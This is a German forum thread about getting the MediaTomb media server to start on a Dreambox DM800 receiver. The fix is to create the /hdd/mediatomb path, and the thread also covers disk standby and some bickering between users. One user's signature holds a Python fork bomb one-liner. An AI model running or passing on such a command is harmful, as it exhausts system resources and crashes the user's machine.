[geloest] Media Tomb

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • [geloest] Media Tomb

      Original von linus76
      Vielleicht kann mich hier ja mal jemand aufklären.

      Wenn ich den MediaTomb Server wie in der Anleitung über den Befehl "mediatomb" starte, so sehe ich ja am ende vom Log den Port mit dem ich auf das WebIF des MediaTomb komme.

      192.168.0.xxx:49152

      Bei den laufenden Prozessen erscheint der MediaTomb auch.

      Dies läuft auch soweit und der Server erscheint auf der PS3 und man kann problemlos die Verzeichnisse der DM800 Freigeben über das WebIF, und werden auch so von der PS3 gelesen.

      Scheinbar lässt sich der MediaTomb so aber nur über einen Neustart der Box beenden.

      Nun habe ich probiert den MediaTomb über den befehl

      /etc/init.d/mtb start

      Starting upnp media server: mediatomb.

      zu starten. Laut der telnet Meldung startet der Server auch, jedoch ist er nicht unter den laufenden Prozessen zu finden. Und auf das WebIF mit dem oben erhaltenen Port kommt nur eine Login Seite vom MediaTomb, die kommt aber immer bei diesem Port. Auch direkt nachdem die Box gestartet wurde.

      An den configs habe ich nichts geändert. Da ja alles läuft wenn ich über den Befehl "mediatomb" starte. Allerdings hatte ich da Probleme das die Festplatte willkürlich anlief, und würde es daher noch einmal auf dem anderen Weg testen



      Du musst in hdd den pfad mediatomb anlegen dann startet mediatomb richtig !!

      weil im /etc/init.d/mtb steht als pfad .. /hdd/mediatomb

      und wenn eben der pfad mediatomb auf hdd nicht existiert dann startet das teil nicht


      @kati1910

      sorry das ich nochmal eine thread oeffne .....
      Why drink & Drive ?

      When you can smoke & fly 8)

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von dreamedge ()

    • wo ich hier DreamBox und PS3 lesen ... kann ich das aktuelle Programm auf die PS3 streamen?

      TV steht halt im Wohnzimmer, die PS3 wahlweise (ohne viel Aufwand im Schlafzimmer). Wenn ich halt mal im Bett TV gucken will (ohne umzuschalten), würde sowas hiermit gehen? oder nur die kompl. Filme, die auf der HDD sind?
      - Dreambox DM 800 S HD PVR
      - Onkyo TX NR 616
      - Philips 52 PFL 8605
      - Philips 42 PFL 7633

      - Teufel Concept S +R (black)
      - PS3 Slim 120GB
    • RE: [geloest] Media Tomb

      Original von dreamedge

      Du musst in hdd den pfad mediatomb anlegen dann startet mediatomb richtig !!

      weil im /etc/init.d/mtb steht als pfad .. /hdd/mediatomb

      und wenn eben der pfad mediatomb auf hdd nicht existiert dann startet das teil nicht



      Danke so geht es auch letzt endlich.

      @kati1910

      Ich hoffe das ist nicht dein Normalton den du hier an den Tag legst.

      Mich regt das langsam auf diese behauptungen dies und das geht nicht wenn du mediatomb so aufrufst erstellt er neue configs und database und das im /home/root aber klar ihr wisst ja alles besser hauptsache irgendwelchen unsinn auf der konsole eingegeben.Hier jedenfalls geht das ohne probleme sowie auf anderen boxen auch.


      Denn wenn du richtig gelesen hast dann habe ich gefragt was den falsch läuft und lediglich geschildert das ich das so nicht zum laufen bekomme, und da brauch ich mich bestimmt auch nicht von dir so anpflaumen zu lassen und ein Grund den Thread zu schließen gab es schon gar nicht, denn vielleicht haben andere ähnliche Probleme.

      Wenn dir was nicht passt kannst meinen Account ja löschen.
      Dreambox 920UHD
      2x Dreambox 7020HD

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von linus76 ()

    • Freud mich linus76 das es läuft. :D

      @kati1910
      Der Ton macht die Musik, und deiner war bei dem Statement ziemlich daneben. ;)

      Wäre vielleicht ganz gut wenn jemand der das Teil nutzt mal ein HowTow macht, damit es auch für die nicht erfahrenen zu bewerkstelligen ist Meditomb im V3 zu nutzen. Vielleicht eine gute Aufgabe für linus76 ^^
      Warning-clone box detected-system stop
      contact your dealer-adios amigo!
    • Muss jetzt erst mal schauen wieso der beim Neustart die ganzen Pfade verloren hat die ich Freigegeben habe.

      Werde das nochmal alles neu machen nach den neuen Erkenntnissen und hoffe das die Pfade dann beim Neustart nicht wieder weg sind.
      Dreambox 920UHD
      2x Dreambox 7020HD
    • RE: [geloest] Media Tomb

      Original von linus76

      Wenn dir was nicht passt kannst meinen Account ja löschen.


      Wenn Du mit dem Ton nicht umgehen kannst und direkt beleidigte Leberwurst spielen musst, nur weil jemand verstaendlicher weise genervt von de ganzen Heulerei ist, kannste Deinen Account auch gerne selber loeschen. :P
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • RE: [geloest] Media Tomb

      Original von LoUiS
      Original von linus76

      Wenn dir was nicht passt kannst meinen Account ja löschen.


      Wenn Du mit dem Ton nicht umgehen kannst und direkt beleidigte Leberwurst spielen musst, nur weil jemand verstaendlicher weise genervt von de ganzen Heulerei ist, kannste Deinen Account auch gerne selber loeschen. :P


      Wo heult denn einer??? Ich hab wohl ganz normal geschrieben das es so nicht geht wie es gesagt wird und ob jemand noch einen Tip hat oder was ich falsch mache. Keiner hat gesagt das ich nicht was falsch mache.

      Aber so wie es gesagt wurde das es gehen soll ging es nunmal nicht, also wer heult da jetzt bitte?

      Zudem hatte Xwolverin gebeten einen neuen Thread deswegen zu machen, damit andere auch was von haben.

      In erster Linie ging es mir lediglich darum das die Festplatte mit dem Mediatomb nicht mehr in den Standby ging. Ob ich den nun so starte oder auf die Art in der Anleitung ist mir vollkommen Latte, wenn die Festplatte nicht im Standby bleibt hat sich das sowieso erledigt das Tool.
      Dreambox 920UHD
      2x Dreambox 7020HD

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von linus76 ()

    • @ LoUiS
      Also echt... Alles halb so wild... einfach mal tief Luft holen, und drüber lachen. :)

      @ linus76
      wenn du bis nächste Woche nicht weiter gekommen bist, kann ich dir gerne helfen, habe zur Zeit selbst zu viel um die Ohren als das ich mich mit dem Thema richtig auseinander setzen könnte.
      Warning-clone box detected-system stop
      contact your dealer-adios amigo!
    • Also wenn man richtig startet bleiben auch die Freigegebenen Verzeichnisse nach einem Neustart, das doch schon mal viel wert.

      Jetzt kommt nur der Entscheidende Faktor ob die Festplatte im Standby bleibt oder nicht, wenn ja passt alles, wenn nein fliegts wieder runter, oder es hat noch jemand einen Tip.
      Dreambox 920UHD
      2x Dreambox 7020HD
    • RE: [geloest] Media Tomb

      Original von linus76
      In erster Linie ging es mir lediglich darum das die Festplatte mit dem Mediatomb nicht mehr in den Standby ging.


      war das den jemals anders .. ?
      Why drink & Drive ?

      When you can smoke & fly 8)
    • Wie meinen? Sorry jetzt steh ich auf der Leitung was genau du meinst?

      Den MediaTomb gibt es ja erst seit 3.0 und ich hab festgestellt das meine interne Platte plötzlich auch nicht mehr in den Standby ging, und da lag der Verdacht nahe das es an MediaTomb liegt.

      Wenn das mit dem plugin normal ist das die Festplatte plötzlich im Standby anläuft, kommt es eben wieder weg. Aber das will ich halt jetzt nochmal testen.
      Dreambox 920UHD
      2x Dreambox 7020HD
    • Nicht der ton sondern behaupten etwas geht nicht und dann stellt sich heraus handhabungsfehler.
      Und howtos für mediatomb gibts genügend im netz sofern man das überhaupt braucht files lassen sich einfach per klick im browser hinzufügen oder entfernen.
      P.S
      Die Platte geht hier in standby selbst mit laufenden mediatomb.
      Aber schwamm drüber zukünftig halte ich mich aus allem raus und kümmere mich nur noch um meinen shice. 8) 8)
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • aha ....das wusste ich nicht ...

      meinte das standby der hdd ....

      aber das ist ein mediaserver der via der hdd laeuft ...erscheint mir logisch das die platte nicht in den standby geht ...
      Ich befuerchte das das dazu gehoert .... wissen tu ich es nicht 8)
      Why drink & Drive ?

      When you can smoke & fly 8)
    • @linus76: mit "der Heulerei" warst auch nicht Du direkt gemeint, sondern allgemein die aktuelle Heulerei hier im Forum wo jeder irgenwas zu meckern hat oder irgendwelche absolut kritische Fehler findet. *g* Das man danei irgendwann mal kein Lust mehr hat was zu machen, oder es mal etwas "lauter" wird doch auch verstaendlich. ;)
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Original von kati910
      Nicht der ton sondern behaupten etwas geht nicht und dann stellt sich heraus handhabungsfehler.
      Und howtos für mediatomb gibts genügend im netz sofern man das überhaupt braucht files lassen sich einfach per klick im browser hinzufügen oder entfernen.
      P.S
      Die Platte geht hier in standby selbst mit laufenden mediatomb.
      Aber schwamm drüber zukünftig halte ich mich aus allem raus und kümmere mich nur noch um meinen shice. 8) 8)


      Dann zeig mir den Handhabungsfehler doch bitte. Ich hab genau geschrieben wie du gesagt hast.Und so ging es nun mal nicht, das zuvor das Verzeichniss angelegt werden muss hat ja keiner gesagt. Das der Pfad in der config steht hab ich auch gesehen, aber nicht ob er den nun selbst anlegt oder der Pfad angelegt werden muss.

      Hättest geschrieben dir fehlt der Pfad wäre alles gut gewesen.

      @Louis
      Das gerade bei einem Release viel kommt ist klar oder? Und das auch viel selbst verschuldet ist auch. Und natürlich auch das man da schnell mal die Lust verliert wenn man sich viel mühe gibt, und dann alle was zu maulen haben. Aber man sollte schon noch irgendwo unterscheiden können, und einen Grund den Thread zu schließen gab es absolut nicht.

      Ist jetzt aber auch egal.
      Dreambox 920UHD
      2x Dreambox 7020HD

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von linus76 ()

    • @ kati910
      Nix für ungut, aber dann müsstest du bei 80%, wenn nicht noch mehr, der "Meldungen" hier so reagieren. ;)

      @ linus76
      Und warum die HDD bei einem laufendem "Mediastreamer" kein Standby mehr machen sollte erschließt sich mir nicht wirklich, das sie natürlich nicht in Standby geht wenn jemand drauf zugreift, sollte klar sein. Aber nichts genaues weiß man nicht... Ich kann dir nur sagen das z.B.: beim PCH mit laufendem Mediatomb trotzdem die HDD in Standy geht wenn sie nicht genutzt wird. ;)
      Warning-clone box detected-system stop
      contact your dealer-adios amigo!

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von xwolverine ()

    • Also wie es aussieht, läuft die Festplatte sporadisch an und geht aber wieder in den Standby, dies könnte daran liegen das ich bei MediaTomb "Timed" eingestellt habe, das er nach neuen Dateien sucht. Ist jetzt mal rein eine Vermutung.

      Aber mit dem sporadischen anlaufen kann man leben, so lang sie wieder in den Standby geht, und bisher geht das wenn man den MediaTomb mit /etc/init.d/mtb start startet.

      Nun hab ich aber noch eine Frage, kann man das nicht Irgendwie in ein Menü mit einbauen?
      Dreambox 920UHD
      2x Dreambox 7020HD
    • Original von linus76
      Nun hab ich aber noch eine Frage, kann man das nicht Irgendwie in ein Menü mit einbauen?


      wenn du einen autostart beim booten haben willst setz dir einen link im runlevel und jud ist :D
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • wo ich hier DreamBox und PS3 lesen ... kann ich das aktuelle Programm auf die PS3 streamen?

      TV steht halt im Wohnzimmer, die PS3 wahlweise (ohne viel Aufwand im Schlafzimmer). Wenn ich halt mal im Bett TV gucken will (ohne umzuschalten), würde sowas hiermit gehen? oder nur die kompl. Filme, die auf der HDD sind?

      kann mir hierzu wer was sagen? Oder ne andere Möglichkeit, wie ich das TV-Programm der DreamBox auf die PS3 bekomme?
      - Dreambox DM 800 S HD PVR
      - Onkyo TX NR 616
      - Philips 52 PFL 8605
      - Philips 42 PFL 7633

      - Teufel Concept S +R (black)
      - PS3 Slim 120GB